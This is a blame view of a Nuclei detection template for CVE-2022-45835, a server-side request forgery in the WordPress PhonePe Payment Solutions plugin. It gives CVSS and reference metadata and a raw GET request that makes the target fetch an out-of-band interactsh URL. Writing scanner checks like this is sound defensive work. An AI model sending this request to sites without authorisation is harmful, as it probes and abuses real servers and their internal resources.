daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-45835.yaml

54 lines
2.3 KiB
YAML
Raw Normal View History

templates added
2023-03-31 11:28:24 +00:00
id: CVE-2022-45835
info:
Enhancement: cves/2022/CVE-2022-45835.yaml by md
2023-04-13 17:00:21 +00:00
name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery
templates added
2023-03-31 11:28:24 +00:00
author: theamanrawat
TemplateMan Update [Fri Nov 17 07:09:16 UTC 2023] :robot:
2023-11-17 07:09:16 +00:00
severity: high
templates added
2023-03-31 11:28:24 +00:00
description: |
Enhancement: cves/2022/CVE-2022-45835.yaml by md
2023-04-13 17:00:21 +00:00
WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server.
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 2.0.0.
templates added
2023-03-31 11:28:24 +00:00
reference:
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
- https://wordpress.org/plugins/phonepe-payment-solutions/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45835
TemplateMan Update [Tue Nov 14 05:56:48 UTC 2023] :robot:
2023-11-14 05:56:48 +00:00
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf?_s_id=cve
Enhancement: cves/2022/CVE-2022-45835.yaml by cs
2023-04-17 13:19:36 +00:00
classification:
TemplateMan Update [Fri Nov 17 07:09:16 UTC 2023] :robot:
2023-11-17 07:09:16 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
Enhancement: cves/2022/CVE-2022-45835.yaml by cs
2023-04-17 13:19:36 +00:00
cve-id: CVE-2022-45835
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
cwe-id: CWE-918
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
epss-score: 0.00359
epss-percentile: 0.71627
TemplateMan Update [Fri Nov 17 07:09:16 UTC 2023] :robot:
2023-11-17 07:09:16 +00:00
cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:*
templates added
2023-03-31 11:28:24 +00:00
metadata:
boolean format update
2023-06-04 08:13:42 +00:00
verified: true
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
max-request: 1
TemplateMan Update [Fri Nov 17 07:09:16 UTC 2023] :robot:
2023-11-17 07:09:16 +00:00
vendor: phonepe
product: phonepe
framework: wordpress
templates added
2023-03-31 11:28:24 +00:00
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
templates added
2023-03-31 11:28:24 +00:00
- raw:
- |
GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "cURL Test for PhonePe"
- type: status
status:
- 200
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot:
2024-03-25 11:57:16 +00:00
# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950